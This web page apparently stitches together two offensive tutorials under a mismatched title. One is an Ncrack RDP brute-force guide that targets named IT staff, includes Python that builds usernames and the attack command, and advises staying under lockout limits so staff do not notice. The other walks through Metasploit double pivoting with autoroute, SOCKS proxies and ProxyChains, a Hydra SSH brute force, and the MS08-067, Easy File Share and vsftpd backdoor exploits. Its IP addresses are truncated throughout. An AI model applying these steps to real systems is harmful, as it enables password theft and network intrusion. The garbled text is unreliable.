Hack Computer Using Port 139 445


Ncrack Tutorial – Remote Password Cracking Brute Force

From a previous nmap scan log we found a few Windows machines with the RDP port open and decided to investigate this possibility further. First of all we need some valid usernames, so that we only have to guess the passwords rather than both. We found the names of the IT staff on various social networking websites. These are the key IT staff: jessie tagle, julio feagins, hugh duchene, darmella martis, lakisha mcquain, ted restrepo, kelly missildine. It didn't take long to create valid usernames following the common convention of the first letter of the first name followed by the entire surname (jtagle, jfeagins, hduchene and so on). If you are on BackTrack 5 or BackTrack 5 R1 there is no need to install Ncrack because it is available by default, but on other Linux distributions such as Ubuntu you need to install it.

Ncrack comes from the developers of Nmap, the network port scanner and service detector offering stealth SYN scan, ping sweep, FTP bounce, UDP scan and operating system fingerprinting.


Information gathering. Let's find out which hosts in the network are up and save them to a text list; a regular expression parses the scan output and extracts only the IP addresses. An Nmap ping scan (nmap -sP, spelled -sn in current Nmap) goes no further than determining whether a host is online. After the Ncrack run, four of the IT staff turned out to have some kind of restriction on the machine, except hduchene, who might be the domain administrator; let's find out. Run the terminal server client (tsclient) from the Linux box against the target.

We are in with Hugh Duchene's credentials.
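The preparation steps above (a username list from the staff names, a live-host list from the Nmap ping scan, and the Ncrack command line) as an added example; this is not code from the Ncrack tutorial or from Ncrack itself. The Nmap output, the 192.168.5.0/24 addresses and the file names users.txt and passwords.txt are constructed for the example, and ncrack_cmd() only assembles the argument vector, it does not run Ncrack.

```python
#!/usr/bin/env python3
"""Build the Ncrack inputs for the RDP brute force: usernames from staff
names, live hosts from an Nmap ping-scan log, and the resulting argv.

Added example, not the tutorial's code.  NMAP_LOG and the 192.168.5.x hosts
are constructed sample data.
"""
import re

# The IT staff names gathered from social networks (as listed in the text).
STAFF = ["jessie tagle", "julio feagins", "hugh duchene", "darmella martis",
         "lakisha mcquain", "ted restrepo", "kelly missildine"]

# Constructed sample of an Nmap ping scan.  It mixes the current
# "Nmap scan report" format, the legacy "Host ... appears to be up" format,
# and a verbose-mode "[host down]" line that must NOT end up in the list.
NMAP_LOG = """\
Starting Nmap 7.80 ( https://nmap.org )
Nmap scan report for 192.168.5.10
Host is up (0.0012s latency).
Nmap scan report for dc01.corp.local (192.168.5.11)
Host is up (0.0020s latency).
Host 192.168.5.12 appears to be up.
Nmap scan report for 192.168.5.13 [host down]
Nmap done: 256 IP addresses (3 hosts up) scanned in 2.51 seconds
"""

IPV4 = r"(\d{1,3}(?:\.\d{1,3}){3})"
# "Nmap scan report for 1.2.3.4" or "Nmap scan report for name (1.2.3.4)"
REPORT_RE = re.compile(r"^Nmap scan report for (?:\S+ \()?" + IPV4 + r"\)?\s*$")
# Legacy format: "Host 1.2.3.4 appears to be up."
LEGACY_RE = re.compile(r"^Host " + IPV4 + r" appears to be up\.")


def make_usernames(names):
    """First letter of the given name + whole surname: 'hugh duchene' -> 'hduchene'."""
    users = []
    for full in names:
        parts = full.lower().split()
        if len(parts) < 2:          # a lone surname gives no usable initial
            continue
        users.append(parts[0][0] + parts[-1])
    return users


def live_hosts(nmap_output):
    """Only the IPv4 addresses of hosts Nmap actually reported as up.

    A 'scan report' line is confirmed by the following 'Host is up' line, so
    verbose-mode down hosts are skipped; the legacy line confirms itself.
    """
    hosts, pending = [], None
    for line in nmap_output.splitlines():
        m = REPORT_RE.match(line)
        if m:
            pending = m.group(1)
            continue
        if pending and line.startswith("Host is up"):
            hosts.append(pending)
            pending = None
            continue
        m = LEGACY_RE.match(line)
        if m:
            hosts.append(m.group(1))
    return list(dict.fromkeys(hosts))   # de-duplicate, keep scan order


def ncrack_cmd(hosts, users_file="users.txt", pass_file="passwords.txt",
               service="rdp"):
    """argv for Ncrack: -U/-P are the username and password lists, targets are
    given in Ncrack's service://host form so each host gets the RDP module."""
    return ["ncrack", "-vv", "-U", users_file, "-P", pass_file,
            *[f"{service}://{h}" for h in hosts]]


if __name__ == "__main__":
    with open("users.txt", "w") as f:
        f.write("\n".join(make_usernames(STAFF)) + "\n")
    print(" ".join(ncrack_cmd(live_hosts(NMAP_LOG))))
```

Before pointing this at Windows accounts, read the domain lockout policy: one guess too many locks every account on the list and the IT staff notice immediately. Ncrack's per-service connection-limit and connection-delay options (CL= and cd=) are the throttles for that.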


Explore Hidden Networks With Double Pivoting – Pentest Blog

An n-layered security architecture is built to protect important services, following the concept of Defense in Depth, which has an important place in information security. In this article we analyze, with examples, how attackers can reach hidden networks that were not accessible at the first stage by using pivoting methods.

What is Routing?

The process of determining how devices in different networks communicate with each other is called routing. Routing is usually performed by devices called routers.

Routers forward network packets to their destinations using a routing table. Routing can be done not only by network devices such as routers, but also by any computer with an operating system installed. In the example in the above figure, in order for hosts on the two networks to communicate successfully, a route has to be defined on the router that connects them.

According to the rule defined on the router, access is made from one network to the other. The journey of a network packet is as follows: is the IP address to be accessed on the local network? If it is, the packet is delivered directly; if not, it is handed to the default gateway, which consults its own routing table, and when no more specific route exists the packet is sent out to the internet.

What is Pivoting?

(Image: a rabbit hole, from Alice in Wonderland.) Basically, it is the process of accessing networks that we would not have access to under normal circumstances by using compromised computers. Network isolation becomes useless once a computer that has access to multiple networks is compromised.

With this method, an attacker who performs routing on the compromised systems can access the hidden networks. Every request to the newly discovered network is transmitted over the pivot; it is a kind of tunnel. As seen in the above topology, the device that has two NICs has access to both networks. Under normal circumstances there is no access between these two networks unless a routing rule is defined.

In this structure, the authorized user working on the computer with two NICs has to access some services in the DMZ.

Compromise First Pivot and Port Forwarding

In our attack scenario, the meterpreter shell obtained on the system named RD is also connected to the DMZ network.

Later, during information gathering, it is determined that the target has two NICs. Note: the router in the environment does not route between the networks. The attacker must first define a routing rule on RD to do this.

It is quite easy to do this with Metasploit. The routing rule is created via the current meterpreter session with run autoroute, giving it the subnet of the newly found network. JC is another computer found in the hidden network (7.). There is also a Metasploit post module that meets the same need (post/multi/manage/autoroute). A socks4 proxy can be run as a Metasploit module as well: background the meterpreter session (meterpreter > background) and start the proxy server module. Multiple proxy servers can be chained in this tunneling technique.

In addition to providing anonymity, applications such as ProxyChains can be used in pivoting to direct traffic to newly discovered networks. The proxy is defined in the last line of the ProxyChains configuration file, in its [ProxyList] section; network packets are then delivered to the destination via the defined proxy. Before going further with exploitation, we cover another technique for traffic routing, called port forwarding.

Port Forwarding

Port forwarding is one of the basic steps of pivoting. Direct access to certain services running on systems discovered in the hidden network (web servers etc.) may not be available, because routing is not defined in both directions: we know how to reach the target system and make a request, but the target does not know how to reach us, so the reply never arrives. For this reason we forward a port on our own system to the destination via the established meterpreter session. The forwarding works as long as that session is alive. One important point: the routing provided with the run autoroute command only lets us work inside the Metasploit Framework.

When we try to reach the target with other Kali tools, we need port forwarding or proxychains. Port forwarding can be done with meterpreter's portfwd command.

Usage: portfwd [-h] [add | delete | list | flush] [args]

  -L <opt>  Forward: local host to listen on (optional). Reverse: local host to connect to.
  -R        Indicates a reverse port forward.
  -h        Help banner.
  -i <opt>  Index of the port forward entry to interact with (see the list command).
  -l <opt>  Forward: local port to listen on. Reverse: local port to connect to.
  -p <opt>  Forward: remote port to connect to. Reverse: remote port to listen on.
  -r <opt>  Forward: remote host to connect to.

To access this service, a local port on the attacker machine is forwarded with portfwd add to the SSH port of the target in the hidden network (-l local port, -p remote port, -r remote host; -L selects the local address to listen on). Performing a brute-force attack on the SSH service is then quite simple: by running Hydra through ProxyChains, all of its traffic is routed to the target system through the compromised system.

Two weaknesses were identified on the target: MS08-067 and a BoF (buffer overflow) vulnerability in the Easy File Share application. Access to the target system can be achieved either way. Another option is to continue with the SSH access, but we will continue through MS08-067 and Easy File Share.

MS08-067 Bind TCP

The MS08-067 module under exploit/windows/smb/ is used. The important point here is that a Bind TCP payload is chosen. Since routing is not defined in both directions, the target system cannot reach us directly, so a reverse payload would never connect back. For this reason a Bind TCP payload must be selected: the target listens on a port of its own, and after successful exploitation Metasploit connects to that port over the pivot route. How Reverse TCP and Bind TCP connections work can be examined in the following visuals.

Setting up the MS08-067 Netapi exploit module with the Bind TCP payload and compromising the target: use the module, set RHOST to the target in the hidden network, set PAYLOAD windows/meterpreter/bind_tcp, and run exploit. The Easy File Share module under exploit/windows/http/ is set up with the Bind TCP payload in the same way. We then need to perform information gathering again. The JC machine has two NICs, like the RD machine.

That means we've found our second hidden network (8.). The interface listing from meterpreter's ipconfig on JC:

Interface
  Name         : MS TCP Loopback interface
  Hardware MAC : 0.
  MTU          : 1520
  IPv4 Address : 1.

Interface 65539
  Name         : Intel(R) PRO/1000 MT Desktop Adapter
  Hardware MAC : 0.
  MTU          : 1500
  IPv4 Address : 8.
  IPv4 Netmask : 2.

Interface 65540
  Name         : Intel(R) PRO/1000 MT Desktop Adapter #2
  Hardware MAC : 0.
  MTU          : 1500
  IPv4 Address : 7.
  IPv4 Netmask : 2.

Let's continue information gathering by performing an ARP scan on the second hidden network. We will talk about that in the next chapter.

Double Pivoting

The 8. network is reachable through the JC system. We already have a routing rule between our own network and the 7. network via RD.

In the present case, network packets that go from our network to the JC device (second compromised machine) first go to the RD device (first compromised machine), and RD transmits those packets to JC.

If the attacker wants to reach the 8. network, a second routing rule is needed, this time defined through the JC meterpreter session. For the tools we use outside the Metasploit Framework, we must also run a new socks proxy for that route.

Network packets attempting to reach the 8. network take the following path. RD: "I do not know how to reach the 8. IP address, but I know the system that does; I can direct you to it." JC: "I know how to forward packets from the 7. network to the 8. network."

The final state of the compromised and discovered systems is as follows.

Holy Proxychains

The ProxyChains tool connects the proxy servers and transmits the connection end to end. In the last phase a new socks4 proxy is started for the JC route and added to the proxy list. By activating the dynamic_chain setting, the defined proxy servers are traversed sequentially in the order they are listed, and a dead proxy is skipped rather than breaking the chain.

An Nmap scan run through ProxyChains must be a TCP connect scan (-sT -Pn), since a SOCKS proxy only carries complete TCP connections and a SYN scan would never leave the attacker machine. Run this way, the scan finally reaches its destination. When the scan result is analyzed, a vulnerable version of the vsftpd service is found on the 8. host. The following steps prepare the vsftpd exploit module in the Metasploit Framework (exploit/unix/ftp/vsftpd_234_backdoor) and compromise our final target: use the module, set RHOST to the 8. host, and run exploit.
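The routing story told above (who knows how to reach the 8. network), the reason for choosing a Bind TCP payload, and the ProxyChains chain that stitches the two pivots together can be checked with a small model of the lab. This is an added example, not code from the Pentest Blog article or from Metasploit. The addresses are assumptions standing in for the article's lab: 192.0.2.0/24 for the attacker network, 7.7.7.0/24 and 8.8.8.0/24 for the two hidden networks, RD and JC as the dual-homed pivots and "target" as the vsftpd host. The Metasploit commands it emits (route add, auxiliary/server/socks4a with SRVHOST/SRVPORT) are the ones from the Metasploit of that period; current releases ship the proxy as auxiliary/server/socks_proxy, and the default ProxyChains config path is assumed to be /etc/proxychains.conf.

```python
#!/usr/bin/env python3
"""Model of the double-pivot lab: who can route to whom, why the target
needs a bind payload, and the pivot/proxy configuration that results.

Added example, not the article's code.  All addresses are assumptions:
  attacker  192.0.2.10              on 192.0.2.0/24
  RD        192.0.2.20 + 7.7.7.20   first pivot, two NICs
  JC        7.7.7.30   + 8.8.8.30   second pivot, two NICs
  target    8.8.8.40               vsftpd host on the second hidden net
"""
import ipaddress
from dataclasses import dataclass, field


@dataclass
class Host:
    name: str
    addrs: list                                  # "ip/prefix" per NIC
    routes: dict = field(default_factory=dict)   # ip_network -> next-hop host

    def add_route(self, cidr, via):
        self.routes[ipaddress.ip_network(cidr)] = via

    def next_hop(self, dst):
        """'direct' if dst is on a local NIC, else the longest-prefix route, else None."""
        dst = ipaddress.ip_address(dst)
        if any(dst in ipaddress.ip_network(a, strict=False) for a in self.addrs):
            return "direct"
        matches = [(net.prefixlen, hop) for net, hop in self.routes.items() if dst in net]
        return max(matches)[1] if matches else None


def trace(lab, src, dst, max_hops=8):
    """Walk a packet hop by hop; returns (hosts traversed, delivered?)."""
    path, cur = [src], src
    for _ in range(max_hops):
        hop = lab[cur].next_hop(dst)
        if hop == "direct":
            return path, True
        if hop is None:            # no route here: the packet is dropped
            return path, False
        path.append(hop)
        cur = hop
    return path, False             # routing loop


def payload_type(lab, victim, attacker_ip):
    """reverse_tcp only works if the victim can route back to us; else bind_tcp."""
    _, can_call_back = trace(lab, victim, attacker_ip)
    return "reverse_tcp" if can_call_back else "bind_tcp"


def pivot_setup(pivot_session, hidden_cidr, socks_port):
    """msfconsole commands for one pivot: a route through the session plus a
    SOCKS server on the attacker box that tools outside Metasploit can use."""
    net = ipaddress.ip_network(hidden_cidr)
    return [
        f"route add {net.network_address} {net.netmask} {pivot_session}",
        "use auxiliary/server/socks4a",
        "set SRVHOST 127.0.0.1",
        f"set SRVPORT {socks_port}",
        "run -j",
    ]


def proxychains_conf(socks_ports):
    """dynamic_chain: proxies are traversed in listed order, dead ones skipped."""
    lines = ["dynamic_chain", "proxy_dns", "tcp_read_time_out 15000",
             "tcp_connect_time_out 8000", "[ProxyList]"]
    lines += [f"socks4 127.0.0.1 {p}" for p in socks_ports]
    return "\n".join(lines) + "\n"


def build_lab():
    lab = {h.name: h for h in [
        Host("attacker", ["192.0.2.10/24"]),
        Host("RD", ["192.0.2.20/24", "7.7.7.20/24"]),
        Host("JC", ["7.7.7.30/24", "8.8.8.30/24"]),
        Host("target", ["8.8.8.40/24"]),
    ]}
    # What the two autoroute rules amount to: both hidden nets enter via RD,
    # and RD hands the second one to JC ("I know the system who knows").
    lab["attacker"].add_route("7.7.7.0/24", "RD")
    lab["attacker"].add_route("8.8.8.0/24", "RD")
    lab["RD"].add_route("8.8.8.0/24", "JC")
    return lab


if __name__ == "__main__":
    lab = build_lab()
    print(trace(lab, "attacker", "8.8.8.40"), payload_type(lab, "target", "192.0.2.10"))
    print("\n".join(pivot_setup(1, "7.7.7.0/24", 1080) + pivot_setup(2, "8.8.8.0/24", 1081)))
    print(proxychains_conf([1080, 1081]))   # contents for /etc/proxychains.conf (assumed path)
```

trace(lab, "target", "192.0.2.10") returns (["target"], False): the vsftpd host has no route back to the attacker, which is exactly why the article selects windows/meterpreter/bind_tcp for the JC exploit and why every tool outside Metasploit has to go through the SOCKS chain.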

Summary of the chain:
  • Easy File Share and MS08-067 were found on JC in the 7. network.
  • Successful exploitation of MS08-067 with a Bind TCP payload gave a meterpreter session on JC.
  • Information gathering showed that JC also has two network interfaces.
  • Another routing rule was defined through the JC session for the 8. network.
  • ARP and Nmap scans were run on the 8. network.
  • A vulnerable vsftpd was running on the 8. host and was exploited.

Final

While the attacker's system initially had access only to the first network it was on, as a result of these attacks it also gained access to two hidden networks. We have a video that shows all the instructions together.

© 2017